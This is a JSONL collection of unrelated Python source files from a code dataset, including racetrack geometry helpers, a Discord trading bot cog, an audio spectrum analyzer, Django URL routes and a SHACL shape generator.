{"seq_id":"226741416","text":"import numpy as np\n\n# Shapely Library\nfrom shapely.geometry import Polygon\nfrom shapely.geometry.polygon import LineString\n\n\ndef get_track_waypoints(track_name, absolute_path=\".\"):\n    return np.load(\"%s/Tracks/%s.npy\" % (absolute_path, track_name))\n\n\ndef load_track(track_name, absolute_path=\".\"):\n    if track_name.endswith('.npy'):\n        track_name = track_name[:-4]\n\n    waypoints = get_track_waypoints(track_name, absolute_path)\n\n    # print(\"Loaded %s waypoints\" % waypoints.shape[0])\n\n    l_inner_border = LineString(waypoints[:, 2:4])\n    l_outer_border = LineString(waypoints[:, 4:6])\n    road_poly = Polygon(np.vstack((l_outer_border, np.flipud(l_inner_border))))\n\n    # rescale waypoints to centimeter scale\n    center_line = waypoints[:, 0:2] * 100\n    inner_border = waypoints[:, 2:4] * 100\n    outer_border = waypoints[:, 4:6] * 100\n\n    return center_line, inner_border, outer_border, road_poly\n\n\ndef get_angle(p0, p1, p2):\n    v0 = np.array(p0) - np.array(p1)\n    v1 = np.array(p2) - np.array(p1)\n\n    angle = np.math.atan2(np.linalg.det([v0, v1]), np.dot(v0, v1))\n    return np.degrees(angle)\n
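\n\n# Editor's illustrative note (not in the original): get_angle returns the signed angle\n# at vertex p1, in degrees, e.g. get_angle((1, 0), (0, 0), (0, 1)) -> 90.0\n\n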
\ndef get_vector_length(v):\n    return np.sqrt(v[0] ** 2 + v[1] ** 2)\n\n\ndef normalize_vector(v):\n    return v / get_vector_length(v)\n\n\n# TODO Watch this, it might be putting points inside out\ndef get_orthogonal_vector_for_straight_line(before, point):\n    v0 = np.array(before) - np.array(point)\n    if v0[0] * v0[1] == 0:\n        border_vector = -np.array([-v0[1], v0[0]])\n    else:\n        border_vector = -1 / np.array([-v0[0], v0[1]])\n\n    border_vector = normalize_vector(border_vector)\n\n    return border_vector\n\n\ndef crossing_point_for_two_lines(l1_p1, l1_p2, p, p2):\n    if l1_p1[0] == l1_p2[0]:\n        # if the waypoint line is vertical\n        x = l1_p1[0]\n        a1, b1 = get_a_and_b_for_line(p, p2)\n    elif p[0] == p2[0]:\n        # if the location line is vertical\n        x = p[0]\n        a1, b1 = get_a_and_b_for_line(l1_p1, l1_p2)\n    else:\n        a1, b1 = get_a_and_b_for_line(l1_p1, l1_p2)\n        a2, b2 = get_a_and_b_for_line(p, p2)\n        x = (b2 - b1) / (a1 - a2)\n    y = a1 * x + b1\n    return x, y\n\n\ndef get_a_and_b_for_line(p1, p2):\n    a1 = (p1[1] - p2[1]) / (p1[0] - p2[0])\n    b1 = p2[1] - a1 * p2[0]\n    return a1, b1\n\n\ndef get_a_point_on_a_line_closest_to_point(l1_p1, l1_p2, p):\n    vector = get_orthogonal_vector_for_straight_line((l1_p1[0], l1_p1[1]),\n                                                     (l1_p2[0], l1_p2[1]))\n    p2 = np.array([p[0], p[1]]) + vector\n    crossing_point = crossing_point_for_two_lines(l1_p1, l1_p2, p, p2)\n    return crossing_point\n\n\ndef is_point_on_the_line(l1_x1, l1_y1, l1_x2, l1_y2, x1, x2):\n    # NOTE: the original computed the identical angle twice (a1 and a2); a single\n    # magnitude check is kept here, assuming the intent was a small signed angle.\n    a1 = get_angle([l1_x1, l1_y1], [l1_x2, l1_y2], [x1, x2])\n    return abs(a1) < 5\n\n\ndef plot_trackpoints(trackpoints, show=True):\n    import matplotlib.pyplot as plt\n    for point in trackpoints:\n        plt.scatter(point[0], point[1], c=\"blue\")\n        plt.scatter(point[2], point[3], c=\"black\")\n        plt.scatter(point[4], point[5], c=\"cyan\")\n    if show:\n        plt.show()\n","sub_path":"Notebooks/python/track_utils.py","file_name":"track_utils.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"394655040","text":"#!/usr/bin/env python3\nimport sys\ntry:\n    from typing import List\nexcept ImportError:\n    pass\n\n\ndef solve(H: int, W: int, a: \"List[List[int]]\"):\n    ans = []  # type: List[List[int]]\n    p = 0\n    for i in range(H):\n        if i % 2 == 0:\n            js = range(W)\n        else:\n            js = reversed(range(W))\n        for j in js:\n            if a[i][j] % 2 == 1:\n                p ^= 1\n            nexti = i\n            nextj = j + (1 if i % 2 == 0 else -1)\n            if nextj == -1:\n                nexti += 1\n                nextj = 0\n            elif nextj == W:\n                nexti += 1\n                nextj = W - 1\n            if p:\n                ans.append([i, j, nexti, nextj])\n    if p:\n        del ans[-1]\n    print(len(ans))\n    for i, j, nexti, nextj in ans:\n        print(i + 1, j + 1, nexti + 1, nextj + 1)\n\n\ndef main():\n    def iterate_tokens():\n        for line in sys.stdin:\n            for word in line.split():\n                yield word\n    tokens = iterate_tokens()\n    H = int(next(tokens))  # type: int\n    W = int(next(tokens))  # type: int\n    a = [[int(next(tokens)) for _ in range(W)] for _ in range(H)]  # type: \"List[List[int]]\"\n    solve(H, W, a)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Python_codes/p03263/s060989571.py","file_name":"s060989571.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"649213398","text":"\r\n# Arguments => the values sent into a function  # Arguments = name, lname (at the point where the function is called)\r\n# Parameter => the variables that receive the data sent in to work with, from Arguments = a,b\r\n# mnemonic: Arguments send - Parameters receive\r\n\r\ndef mydata(a,b): # values are sent inside ()  Structure : def func_name(the variables (parameters) to be passed into the function)\r\n    print(\"name:\",a,b)\r\n\r\nname = input(\"Input name: \")\r\nlname = input(\"Input lname: \")\r\nmydata(name,lname)\r\n","sub_path":"KR_Python_Day 9_Arguments & Parameter.py","file_name":"KR_Python_Day 9_Arguments & Parameter.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"540121287","text":"from rest_framework.routers import DefaultRouter\nfrom django.conf.urls import url,include\nfrom .api import UsersViewSet,ClientesViewSet\nfrom django.urls import path\nfrom . import views\n\nrouter = DefaultRouter()\nrouter.register(r'users',UsersViewSet)\nrouter.register(r'clientes',ClientesViewSet)\n\n
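# Editor's note (not in the original): DefaultRouter auto-generates list/detail\n# routes (users/, users/<pk>/, ...) for each registered ViewSet, exposed through\n# the include() below; note the 'cards_endpoint' prefix carries no trailing slash.\n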
urlpatterns = [\n    path('cards_endpoint', include(router.urls)),\n\n    path(\"register/\", views.UserRegister,name='register'),\n    path(\"login/\", views.UserLogin,name='login'),\n    path(\"logout/\", views.UserLogout,name='logout'),\n\n    path(\"profile_edit/\", views.UserEditProfile, name='profile_edit'),\n    path(\"user_profile/\", views.UserProfile, name='user_profile'),\n    path(\"user_change_password/\", views.UserChangePassword, name='user_change_password'),\n\n    path(\"index/\", views.paginaInicial, name='index'),\n    path(\"register_cliente/\", views.RegisterClientes, name='register_cliente'),\n    path(\"list_clientes/\", views.ListClientes, name='list_clientes'),\n    path(\"cliente_view//\", views.ClientesView, name='cliente_view'),\n    path(\"cliente_delete//\", views.ClientesDelete, name='cliente_delete'),\n    path(\"pdmodel/sum_table/\", views.SumTable,name='sum_table'),\n    path(\"pdmodel/actual_df/\", views.ActualPredictedProbs,name='actual_df'),\n    path(\"pdmodel/score_card/\", views.ScoreCard,name='score_card'),\n    path(\"pdmodel/credit_score/\", views.CreditScore,name='credit_score'),\n    path(\"pdmodel/cut_off/\", views.CutOffs,name='cut_off'),\n    path(\"lgdmodel/sum_table/\", views.LgdSumTable,name='lgdmodel_sum_table'),\n    path(\"lgdmodel/proba/\", views.ProbaFunction,name='lgdmodel_proba'),\n    path(\"lgdmodel/df_actual/\", views.LgdActualPreditedProbs,name='lgdmodel_df_actual'),\n    path(\"eadmodel/\", views.getEADModel,name='eadmodel'),\n    path(\"expectedlost/\", views.getExpectedLostModel,name='expectedlost'),\n]","sub_path":"cards/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"146518229","text":"import asyncio\nimport string\nimport secrets\n\nfrom discord.ext import commands\n\nfrom database import DatabaseIdol, DatabaseDeck\n\n\nclass Trade(commands.Cog):\n    def __init__(self, bot):\n        \"\"\"Initialize the cog with the bot.\"\"\"\n        self.bot = bot\n\n    #### Commands ####\n    @commands.command(description='Trade one idol for another.')\n    async def trade(self, ctx, user, name, group=None):\n        if not ctx.message.mentions:\n            await ctx.message.add_reaction(u\"\\u274C\")\n            await ctx.send('Please specify a user.')\n            return None\n\n        id_idol_give = await self.can_give(ctx, ctx.author, name, group)\n        if not id_idol_give:\n            return\n\n        user = ctx.message.mentions[0]\n\n        def check_name_group(message):\n            param = list(filter(None, map(str.strip, message.content.split('\"'))))\n            return message.author == user and (not param or 1 <= len(param) <= 2)\n\n        await ctx.send(f'{user.mention}, {ctx.author.mention} wants to trade with you.\\n'\n                       f'Who do you want to trade for **{name}**?\\n'\n                       f'\\nType name [\"group\"] **(\"\" required around group!)**')\n        try:\n            msg = await self.bot.wait_for('message', timeout=30, check=check_name_group)\n        except asyncio.TimeoutError:\n            await ctx.message.add_reaction(u\"\\u274C\")\n            await ctx.send('Too late... 
Trade is cancelled.')\n            return\n\n        arg = list(filter(None, map(str.strip, msg.content.split('\"'))))\n        name_receive = arg[0]\n        group_receive = [] if len(arg) == 1 else arg[1]\n\n        id_idol_receive = await self.can_give(ctx, user, name_receive, group_receive)\n        if not id_idol_receive:\n            return\n\n        def check(message):\n            return message.author == ctx.author and \\\n                   (message.content.lower() == 'yes' or message.content.lower() == 'y' or\n                    message.content.lower() == 'no' or message.content.lower() == 'n')\n\n        await ctx.send(f'{user.mention} trades **{name_receive}** for **{name}**.\\n'\n                       f'{ctx.author.mention}, do you accept? (y|yes or n|no)\\n')\n        try:\n            msg = await self.bot.wait_for('message', timeout=30, check=check)\n        except asyncio.TimeoutError:\n            await ctx.message.add_reaction(u\"\\u274C\")\n            await ctx.send('Too late... Trade is cancelled.')\n        else:\n            if msg.content.lower() == 'y' or msg.content.lower() == 'yes':\n                DatabaseDeck.get().give_to(ctx.guild.id, id_idol_give, ctx.author.id, user.id)\n                DatabaseDeck.get().give_to(ctx.guild.id, id_idol_receive, user.id, ctx.author.id)\n                await ctx.message.add_reaction(u\"\\u2705\")\n                await msg.add_reaction(u\"\\u2705\")\n            else:\n                await ctx.send('Trade is cancelled.')\n\n    @commands.command(description='Give one idol to someone.')\n    async def give(self, ctx, user, name, group=None):\n        if not ctx.message.mentions:\n            await ctx.message.add_reaction(u\"\\u274C\")\n            await ctx.send('Please specify a user.')\n            return None\n\n        id_idol = await self.can_give(ctx, ctx.author, name, group)\n        if not id_idol:\n            return\n\n        user = ctx.message.mentions[0]\n\n        def check(message):\n            return message.author == user and (message.content.lower() == 'yes' or message.content.lower() == 'y' or\n                                               message.content.lower() == 'no' or message.content.lower() == 'n')\n\n        await ctx.send(f'{user.mention}, {ctx.author.mention} wants to give you **{name}**.\\n'\n                       f'Type y|yes or n|no.')\n        try:\n            msg = await self.bot.wait_for('message', timeout=30, check=check)\n        except asyncio.TimeoutError:\n            await ctx.message.add_reaction(u\"\\u274C\")\n            await ctx.send('Too late... Give is cancelled.')\n        else:\n            if msg.content.lower() == 'y' or msg.content.lower() == 'yes':\n                DatabaseDeck.get().give_to(ctx.guild.id, id_idol, ctx.author.id, user.id)\n                await ctx.message.add_reaction(u\"\\u2705\")\n                await msg.add_reaction(u\"\\u2705\")\n            else:\n                await ctx.send('Give is cancelled.')\n\n    @commands.command(description='Remove an idol from your deck (can\'t be undone!).')\n    async def discard(self, ctx, name, group=None):\n        id_idol = await self.can_give(ctx, ctx.author, name, group)\n        if not id_idol:\n            return\n\n        def check(message):\n            return message.author == ctx.author \\\n                   and message.channel == ctx.message.channel \\\n                   and (message.content.lower() == 'yes' or message.content.lower() == 'y' or\n                        message.content.lower() == 'no' or message.content.lower() == 'n')\n\n        await ctx.send(f'{ctx.author.mention}, are you sure you want to discard **{name}**? 
(y|yes or n|no)\\n')\n try:\n msg = await self.bot.wait_for('message', timeout=30, check=check)\n except asyncio.TimeoutError:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Discard is cancelled.')\n else:\n if msg.content.lower() == 'y' or msg.content.lower() == 'yes':\n DatabaseDeck.get().give_to(ctx.guild.id, id_idol, ctx.author.id, None)\n await ctx.message.add_reaction(u\"\\u2705\")\n await msg.add_reaction(u\"\\u2705\")\n else:\n await ctx.send('Discard is cancelled.')\n\n @commands.command(description='Remove all idols from your deck (can\\'t be undone!).')\n async def discard_all(self, ctx):\n letters = string.ascii_letters\n random_string = 'cancel'\n\n while random_string == 'cancel':\n random_string = ''.join(secrets.choice(letters) for i in range(5))\n\n def check(message):\n return message.author == ctx.author \\\n and message.channel == ctx.message.channel \\\n and (message.content == random_string or message.content.lower() == 'cancel')\n\n await ctx.send(f'{ctx.author.mention}, are you sure you want to discard **all your deck**?\\n'\n f'This cannot be undone! Please type *{random_string}* (with case) to confirm '\n f'or *cancel* to cancel.')\n try:\n msg = await self.bot.wait_for('message', timeout=30, check=check)\n except asyncio.TimeoutError:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Discard is cancelled.')\n else:\n if msg.content.lower() == 'cancel':\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send('Discard is cancelled.')\n return\n\n ids_deck = DatabaseDeck.get().get_user_deck(ctx.guild.id, ctx.author.id)\n\n for id_idol in ids_deck:\n DatabaseDeck.get().give_to(ctx.guild.id, id_idol, ctx.author.id, None)\n\n await ctx.message.add_reaction(u\"\\u2705\")\n await msg.add_reaction(u\"\\u2705\")\n\n @staticmethod\n async def can_give(ctx, author, name, group=None):\n \"\"\"Return idol id if the user can give, None otherwise.\"\"\"\n ## Find idol id\n name = name.strip()\n\n if group:\n group = group.strip()\n\n id_idol = None\n\n if group:\n id_idol = DatabaseIdol.get().get_idol_group_id(name, group)\n else:\n ids = DatabaseIdol.get().get_idol_ids(name)\n if ids:\n id_idol = ids[0]\n\n if not id_idol:\n msg = f'I searched everywhere for **{name}**'\n if group:\n msg += f' in the group *{group}*'\n msg += ' and I couldn\\'t find anything.\\nPlease check the command.'\n await ctx.send(msg)\n return None\n\n ## Check if idol belongs to author\n owner = DatabaseDeck.get().idol_belongs_to(ctx.guild.id, id_idol)\n if not owner or owner != author.id:\n await ctx.message.add_reaction(u\"\\u274C\")\n await ctx.send(f'You don\\'t own **{name}**{\" from *\" + group + \"* \" if group else \"\"}...')\n return None\n\n return id_idol\n","sub_path":"src/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":8311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"293664698","text":"\n\n\n\n'''\n┌ [[block, block, ...]] ┐\n│ [buffer] │\n│ [buffer] │ stack\n│ [buffer] │\n└ [...] 
┘\n'''\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport scipy.io.wavfile\nimport scipy.signal\nimport sounddevice as sd\n\nbitrate = 44100\ndownsamplerate = 10 # averaging in batches of n (the microphone yields nothing but 44100)\nblocksize = 4410 # size of the block taken from the stream (glitches at values above 20000)\nbuffersize = 2 # buffer size (in blocks)\nstacksize = 1 # size of the averaging stack (in buffers)\n\naw_data = np.array((6.3, -85.4,\n                    6.3, -85.4,\n                    8, -77.8,\n                    10, -70.4,\n                    12.5, -63.4,\n                    16, -56.7,\n                    20, -50.5,\n                    25, -44.7,\n                    31.5, -39.4,\n                    40, -34.6,\n                    50, -30.2,\n                    63, -26.2,\n                    80, -22.5,\n                    100, -19.1,\n                    125, -16.1,\n                    160, -13.4,\n                    200, -10.9,\n                    250, -8.6,\n                    315, -6.6,\n                    400, -4.8,\n                    500, -3.2,\n                    630, -1.9,\n                    800, -0.8,\n                    1000, 0,\n                    1250, 0.6,\n                    1600, 1,\n                    2000, 1.2,\n                    2500, 1.3,\n                    3150, 1.2,\n                    4000, 1,\n                    5000, 0.5,\n                    6300, -0.1,\n                    8000, -1.1,\n                    10000, -2.5,\n                    12500, -4.3,\n                    16000, -6.6,\n                    20000, -9.3))\naw = aw_data[::2], aw_data[1:][::2]\n\n#GdB = 20log_10(A2/A1)\n#A2 = A1 * 10**(Gdb/20)\n\ndef abydb(A1, Gdb):\n    A2 = A1 * 10**(Gdb / 20)\n    return A2\n\n\n\n\n\n\n\n\n\n\nfig = plt.figure()\nxlim = (1e1, 1e4) # frequency range\nylim = (1e-9, 1e4) # spectral density range\nax = plt.axes(xlim=xlim, ylim=ylim, xscale='log', yscale='log')\n\npoints = ax.plot([], [], marker='.')[0] # placeholder artist\n\ndef animate(i):\n    stack = np.zeros((stacksize, 438))\n    for j in range(stacksize):\n\n        # %%\n        buffer = np.zeros((buffersize, blocksize//downsamplerate))\n        for i in range(buffersize):\n            def callback(indata, frames, time, status):\n                dsblock = scipy.signal.decimate(indata.T[0], downsamplerate)\n                # print(dsblock.shape)\n                buffer[i].put(np.arange(dsblock.size), dsblock)\n            with sd.InputStream(device=1, callback=callback,\n                                blocksize=blocksize, channels=1):\n                sd.sleep(int(blocksize / bitrate * 1000 + 42))\n\n        spec = np.abs(np.fft.fft(buffer.flatten()))**2\n        freq = np.fft.fftfreq(buffer.flatten().size, 1/(bitrate/downsamplerate))\n        idx = np.argwhere((freq > 13.75) & (freq < 500000))\n        spec_cut = spec[idx]\n        freq_cut = freq[idx]\n        spec_cut_aw = abydb(spec_cut, np.interp(freq_cut, aw[0], aw[1])) # A-weighting\n        # ax = plt.axes(xlim=xlim, ylim=ylim, xscale='log', yscale='log')\n        # ax.plot(freq_cut, spec_cut)\n        # spec_cut.shape\n\n        # %%\n\n        stack[j] = spec_cut_aw.flatten()\n    # print(np.mean(stack, 0).shape)\n    points.set_data(freq_cut, np.mean(stack, 0))\n\n\nfps = 2\nanim = animation.FuncAnimation(fig, animate, frames=42, interval=1000/fps)\n\n\n\n\n\n\n\n","sub_path":"soundmax/!dump/sdm 1.2 190409-2004.py","file_name":"sdm 1.2 190409-2004.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"352399321","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/romainegele/Documents/Argonne/deephyper/build/lib/deephyper/search/nas/baselines/deepq/experiments/enjoy_mountaincar.py\n# Compiled at: 2019-07-10 12:45:57\n# Size of source mod 2**32: 642 bytes\nimport gym\nfrom deephyper.search.nas.baselines import deepq\nfrom deephyper.search.nas.baselines.common import models\n\ndef main():\n    env = gym.make('MountainCar-v0')\n    act = deepq.learn(env,\n      network=models.mlp(num_layers=1, num_hidden=64),\n      total_timesteps=0,\n      load_path='mountaincar_model.pkl')\n    while True:\n        obs, done = env.reset(), False\n        episode_rew = 0\n        while not done:\n            
env.render()\n obs, rew, done, _ = env.step(act(obs[None])[0])\n episode_rew += rew\n\n print('Episode reward', episode_rew)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/deephyper-0.1.5-py2.py3-none-any/enjoy_mountaincar.cpython-36.py","file_name":"enjoy_mountaincar.cpython-36.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164906627","text":"#! python3\n# makeBrazil.py\n\nimport sys, shutil, os\nfrom PIL import Image\n\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\n\noriginal = Image.open(sys.argv[1])\nprint(original.size)\nmosaic = Image.new('RGB', (original.size[0]*200, original.size[1]*200), color=(255,255,255))\n\npath = ('C:\\\\test\\\\LKDlogos\\\\')\nlogoList = os.listdir(path)\n\nnextImage = 0\n\nfor c in range(0,original.size[0]):\n for r in range(0,original.size[1]):\n pixel = original.getpixel((c,r))\n if pixel == 0:\n logo = Image.open(path+logoList[nextImage]).resize((200, 200))\n nextImage += 1\n mosaic.paste(logo, (c*200, r*200))\n\nmosaic.save(\"C:\\\\test\\\\mosaic.png\")","sub_path":"logoMosaic.py","file_name":"logoMosaic.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"598132585","text":"#!/usr/bin/env python\n\n\nimport collections\nimport json\nfrom datetime import datetime\nfrom urllib.parse import urlparse\n\nimport pkg_resources\nimport rdflib\nfrom progressbar import Percentage, ProgressBar,Bar,ETA\nfrom rdflib import Namespace, URIRef, BNode, Literal\nfrom rdflib.namespace import RDF\nfrom rdflib.util import guess_format\n\n\nclass data_graph():\n def __init__(self, args: list):\n self.G = rdflib.Graph()\n self.G.open(\"store\", create=True)\n print(args)\n for graph in args:\n self.G.parse(graph, format=guess_format(graph))\n print(\"Finished loading graph....\")\n print(len(self.G))\n self.CLASSES = collections.OrderedDict()\n self.PROPS = collections.OrderedDict()\n self.PROPS_NEW = collections.OrderedDict()\n self.OUT = []\n\n path = 'prefixes/namespaces.json'\n filepath = pkg_resources.resource_filename(__name__, path)\n\n with open(filepath, 'r', encoding='utf-8') as fin:\n self.names = json.load(fin)\n self.namespaces = []\n print(len(self.G))\n\n def parse_uri(self, URI):\n if '#' in URI:\n label = URI.split(\"#\")[-1]\n else:\n label = URI.split(\"/\")[-1]\n return label\n\n def gen_prefix_bindings(self):\n count = 0\n subs = []\n for s, p, o in self.G.triples((None, None, None)):\n subs.append(p)\n for s, p, o in self.G.triples((None, RDF.type, None)):\n subs.append(o)\n subs = list(set(subs))\n for pred in subs:\n if pred.replace(self.parse_uri(pred), '') not in self.names.values():\n count = count + 1\n self.names['ns' + str(count)] = pred.replace(self.parse_uri(pred), '')\n for pref, uri in self.names.items():\n for s in subs:\n if uri == s.replace(self.parse_uri(s), ''):\n self.namespaces.append((pref, uri))\n self.namespaces = list(set(self.namespaces))\n\n def sh_label_gen(self, uri):\n parsed = uri.replace(self.parse_uri(uri), '')\n for cur, pref in self.names.items():\n if pref == parsed:\n return cur + '_' + self.parse_uri(uri)\n\n def uri_validator(self, x):\n try:\n result = urlparse(x)\n return all([result.scheme, result.netloc])\n except:\n return False\n\n def gen_shape_labels(self, URI):\n if '#' in URI:\n label = URI.split(\"#\")[-1]\n else:\n label = URI.split(\"/\")[-1]\n return label + '_'\n\n def extract_classes(self):\n 
print(\"INFO: extract_classes ...\")\n classes = []\n for s, p, o in self.G.triples((None, RDF.type, None)):\n classes.append(o)\n print(\"INFO: appended classes in classes array...\")\n for c in sorted(classes):\n self.CLASSES[c] = {}\n count = 0\n print(\"INFO: self.CLASSES[c] keys prepared for dict...\")\n print(\"INFO: Started iterating over self.Classes.keys dictionary\")\n pbar = ProgressBar()\n for class_item in pbar(self.CLASSES.keys()):\n # self.CLASSES[class_item]['label'] = self.sh_label_gen(class_item)\n if (self.parse_uri(class_item)):\n self.CLASSES[class_item]['label'] = self.parse_uri(class_item) + \"Shape\"\n else:\n print(\"## error for class item \" + class_item + \" line 91-93 of file shaclgen.py\")\n print(\"INFO: Loop Finished....\")\n\n def extract_props(self):\n self.extract_classes()\n prop = []\n pbar = ProgressBar()\n\n print(\"INFO: Predicate appending ...\")\n for predicate in self.G.predicates(object=None, subject=None):\n prop.append(predicate)\n\n print(\"INFO: RDF.Type prop loop....\")\n props = [x for x in pbar(prop) if x != rdflib.term.URIRef('http://www.w3.org/1999/02/22-rdf-syntax-ns#type')]\n\n print(\"INFO: Started preparing props keys....\")\n for p in sorted(props):\n self.PROPS[p] = {}\n print(\"INFO: Finished preparing props keys....\")\n count = 0\n print(\"INFO: Length of Props: \" + str(len(self.PROPS)))\n\n print(\"INFO: Iterating over PROPS.Keys....\")\n N = len(self.PROPS.keys())\n print(N)\n\n pbarr = ProgressBar(widgets=[Bar('>', '[', ']'), ' ', Percentage(), ' ', ETA()], maxval = N)\n\n for p in pbarr(self.PROPS.keys()):\n print(count)\n self.PROPS[p]['nodekind'] = None\n self.PROPS[p]['cardinality'] = None\n\n count = count + 1\n self.PROPS[p]['classes'] = []\n valProp = str(self.parse_uri(p))\n self.PROPS[p]['label'] = valProp\n prop_classes = []\n\n for sub, pred, obj in self.G.triples((None, p, None)):\n for sub1, pred1, obj1 in self.G.triples((sub, RDF.type, None)):\n prop_classes.append(obj1)\n\n uris = []\n # pbarIn = ProgressBar(widgets=[Bar('>', '[', ']'), ' ', Percentage(), ' ', ETA()], maxval = len(prop_classes))\n [uris.append(x) for x in prop_classes if x not in uris]\n\n # counter = 0\n # pbarIn = ProgressBar(widgets=[Bar('>', '[', ']'), ' ', Percentage(), ' ', ETA()], maxval=len(uris))\n # print(\"INFO: Iterating over URIS\")\n for x in uris:\n # Preparing a new Property\n # counter = counter + 1\n copyOfP = p\n if (self.CLASSES[x]['label']):\n newProp = copyOfP + self.CLASSES[x]['label'] + \"Property\"\n self.PROPS_NEW[newProp] = {}\n self.PROPS_NEW[newProp]['classes'] = []\n self.PROPS_NEW[newProp]['classes'].append(self.CLASSES[x]['label'])\n self.PROPS_NEW[newProp]['label'] = self.parse_uri(newProp)\n self.PROPS_NEW[newProp]['nodekind'] = None\n self.PROPS_NEW[newProp]['cardinality'] = None\n self.PROPS_NEW[newProp]['path'] = p\n # old\n self.PROPS[p]['classes'].append(self.CLASSES[x]['label'])\n else:\n print(\"## else condition for self.CLASSES[x]['label'] \" + x + \" line 128 of file shaclgen.py\")\n\n if len(self.PROPS[p]['classes']) == 1:\n self.PROPS[p]['type'] = 'unique'\n\n else:\n self.PROPS[p]['type'] = 'repeat'\n\n def extract_contraints(self):\n self.extract_props()\n print(\"INFO: Props extraction finished...\")\n pbarInCon = ProgressBar(widgets=[Bar('>', '[', ']'), ' ', Percentage(), ' ', ETA()], maxval=len(self.PROPS_NEW.keys()))\n print(\"Iterating over extracted Properties\")\n count = 0\n for prop in pbarInCon(self.PROPS_NEW.keys()):\n print(count)\n types = []\n for s, p, o in self.G.triples((None, 
self.PROPS_NEW[prop]['path'], None)):\n                types.append(type(o))\n            if len(set(types)) == 1:\n                if types[0] == URIRef:\n                    self.PROPS_NEW[prop]['nodekind'] = 'IRI'\n                elif types[0] == BNode:\n                    self.PROPS_NEW[prop]['nodekind'] = 'BNode'\n                elif types[0] == Literal:\n                    self.PROPS_NEW[prop]['nodekind'] = 'Literal'\n            count = count + 1\n\n    def gen_graph(self, serial='turtle', graph_format=None, namespace=None, verbose=None):\n        # self.extract_props()\n        print(\"INFO: gen_graph begin .....\")\n        self.gen_prefix_bindings()\n        print(\"INFO: gen prefix bindings finished\")\n        self.extract_contraints()\n        print(\"INFO: extract_constraints finished\")\n        print(\"INFO: now creating SHACL shapes...\")\n        ng = rdflib.Graph()\n        SH = Namespace('http://www.w3.org/ns/shacl#')\n        ng.bind('sh', SH)\n\n        for x in self.namespaces:\n            ng.bind(x[0], x[1])\n\n        if namespace != None:\n            if self.uri_validator(namespace[0]) != False:\n                uri = namespace[0]\n                if namespace[0][-1] not in ['#', '/', '\\\\']:\n                    uri = namespace[0] + '#'\n                EX = Namespace(uri)\n                ng.bind(namespace[1], EX)\n            else:\n                print('##malformed URI, using http://www.example.org/ instead...')\n                EX = Namespace('http://www.example.org/')\n                ng.bind('ex', EX)\n        else:\n            EX = Namespace('http://www.example.org/')\n            ng.bind('ex', EX)\n\n        for c in self.CLASSES.keys():\n            label = self.CLASSES[c]['label']\n            ng.add((EX[label], RDF.type, SH.NodeShape))\n            ng.add((EX[label], SH.targetClass, c))\n            ng.add((EX[label], SH.nodeKind, SH.BlankNodeOrIRI))\n\n        for p in self.PROPS_NEW.keys():\n            ng.add((EX[self.PROPS_NEW[p]['label']], RDF.type, SH.PropertyShape))\n            ng.add((EX[self.PROPS_NEW[p]['label']], SH.path, self.PROPS_NEW[p]['path']))\n            # ng.add((EX[self.PROPS_NEW[p]['label']], RDF.type, SH.PropertyShape))\n            # ng.add((EX[self.PROPS_NEW[p]['label']], SH.path, p))\n            #\n            for class_prop in self.PROPS_NEW[p]['classes']:\n                ng.add((EX[class_prop], SH.property, EX[self.PROPS_NEW[p]['label']]))\n            if self.PROPS_NEW[p]['nodekind'] == 'IRI':\n                ng.add((EX[self.PROPS_NEW[p]['label']], SH.nodeKind, SH.IRI))\n            elif self.PROPS_NEW[p]['nodekind'] == 'BNode':\n                ng.add((EX[self.PROPS_NEW[p]['label']], SH.nodeKind, SH.BlankNode))\n            elif self.PROPS_NEW[p]['nodekind'] == 'Literal':\n                ng.add((EX[self.PROPS_NEW[p]['label']], SH.nodeKind, SH.Literal))\n\n        # datetime object containing current date and time\n        now = datetime.now()\n        print(\"now =\", now)\n\n        # dd/mm/YY H:M:S\n        dt_string = now.strftime(\"resources/SHACL_SHAPES_%H_%M_%S_%d_%m_%Y.ttl\")\n        print(\"date and time =\", dt_string)\n\n        print(ng.serialize(format=serial).decode())\n        f = open(dt_string, \"x\")\n        f.write(ng.serialize(format=serial).decode())\n        f.close()\n","sub_path":"shaclgen/shaclgen.py","file_name":"shaclgen.py","file_ext":"py","file_size_in_byte":10185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
